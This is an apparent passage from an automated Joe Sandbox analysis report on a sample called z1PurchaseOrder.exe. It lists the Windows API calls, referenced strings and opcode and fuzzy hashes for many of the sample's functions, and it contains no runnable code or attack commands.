                                        • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                        • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                        APIs
                                          • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                        • CoInitialize.OLE32(00000000), ref: 00475B71
                                        • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                        • CoUninitialize.OLE32 ref: 00475D71
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk$HH
                                        • API String ID: 886957087-3121654589
                                        • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                        • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                        • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                        • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem_memset
                                        • String ID: 0
                                        • API String ID: 1173514356-4108050209
                                        • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                        • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                        • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                        • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 763830540-1403004172
                                        • Opcode ID: 7f2c4204b424c93c7ac22b89fbd31dfb367e10b18f94ca1fc21d6a87b04bc3c1
                                        • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                        • Opcode Fuzzy Hash: 7f2c4204b424c93c7ac22b89fbd31dfb367e10b18f94ca1fc21d6a87b04bc3c1
                                        • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                        APIs
                                        • GetStdHandle.KERNEL32(?), ref: 004439B4
                                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                          • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CurrentHandleProcess$Duplicate
                                        • String ID: nul
                                        • API String ID: 2124370227-2873401336
                                        • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                        • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                        • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                        • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                          • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                          • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CurrentHandleProcess$Duplicate
                                        • String ID: nul
                                        • API String ID: 2124370227-2873401336
                                        • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                        • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                        • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                        • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                        APIs
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                        • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                        • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                        • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                        • String ID: SysAnimate32
                                        • API String ID: 3529120543-1011021900
                                        • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                        • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                        • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                        • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                        APIs
                                        • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                        • TranslateMessage.USER32(?), ref: 0044308B
                                        • DispatchMessageW.USER32(?), ref: 00443096
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchTranslate
                                        • String ID: *.*
                                        • API String ID: 1795658109-438819550
                                        • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                        • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                        • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                        • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                        APIs
                                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                          • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                          • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                          • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                          • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                        • GetFocus.USER32 ref: 004609EF
                                          • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                          • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                        • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                        • __swprintf.LIBCMT ref: 00460A7A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                        • String ID: %s%d
                                        • API String ID: 991886796-1110647743
                                        • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                        • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                        • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                        • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _memset$_sprintf
                                        • String ID: %02X
                                        • API String ID: 891462717-436463671
                                        • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                        • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                        • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                        • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                        APIs
                                        • _memset.LIBCMT ref: 0042CD00
                                        • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z1PurchaseOrder.exe,?,C:\Users\user\Desktop\z1PurchaseOrder.exe,004A8E80,C:\Users\user\Desktop\z1PurchaseOrder.exe,0040F3D2), ref: 0040FFCA
                                          • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                          • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                          • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                          • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                          • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                          • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                        • String ID: $OH$@OH$X
                                        • API String ID: 3491138722-1394974532
                                        • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                        • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                        • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                        • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                        APIs
                                        • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                        • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                        • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                        • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID:
                                        • API String ID: 2449869053-0
                                        • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                        • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                        • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                        • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                        APIs
                                        • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                        • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                        • SendInput.USER32 ref: 0044C509
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: KeyboardMessagePostState$InputSend
                                        • String ID:
                                        • API String ID: 3031425849-0
                                        • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                        • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                        • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                        • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                        • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                        • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Enum$CloseDeleteOpen
                                        • String ID:
                                        • API String ID: 2095303065-0
                                        • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                        • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                        • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                        • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String
                                        • String ID:
                                        • API String ID: 2832842796-0
                                        • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                        • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                        • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                        • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00447997
                                        • GetCursorPos.USER32(?), ref: 004479A2
                                        • ScreenToClient.USER32(?,?), ref: 004479BE
                                        • WindowFromPoint.USER32(?,?), ref: 004479FF
                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                        • String ID:
                                        • API String ID: 1822080540-0
                                        • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                        • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                        • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                        • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00447C1B
                                        • ScreenToClient.USER32(?,?), ref: 00447C39
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                        • EndPaint.USER32(?,?), ref: 00447CD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                        • String ID:
                                        • API String ID: 659298297-0
                                        • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                        • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                        • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                        • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 004478A7
                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                        • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                        • GetCursorPos.USER32(?), ref: 00447935
